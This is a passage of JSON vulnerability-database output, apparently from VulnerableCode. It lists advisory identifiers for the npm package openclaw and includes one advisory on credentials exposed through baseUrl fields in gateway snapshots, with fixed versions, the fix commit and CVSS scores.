                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35649",
                "GHSA-pw7h-9g6p-c378"
            ],
            "risk_score": 3.0,
            "exploitability": "0.5",
            "weighted_severity": "5.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tqzy-84fm-z7b6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91368?format=api",
            "vulnerability_id": "VCID-twsq-vfde-4fbf",
            "summary": "OpenClaw Exposes Credentials Embedded in baseUrl Fields via config.get and channels.status\n## Summary\nRead-scoped gateway snapshots could expose credentials embedded in channel baseUrl and related endpoint fields.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `f0202264d0de7ad345382b9008c5963bcefb01b7`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/channels/account-snapshot-fields.ts now strips URL userinfo from channel status snapshot fields.\n- src/config/redact-snapshot.ts now redacts credential-bearing baseUrl and httpUrl fields while preserving safe context.\n\nOpenClaw thanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/f0202264d0de7ad345382b9008c5963bcefb01b7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/f0202264d0de7ad345382b9008c5963bcefb01b7"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-ppwq-6v66-5m6j",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-ppwq-6v66-5m6j"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-ppwq-6v66-5m6j",
                    "reference_id": "GHSA-ppwq-6v66-5m6j",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-ppwq-6v66-5m6j"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
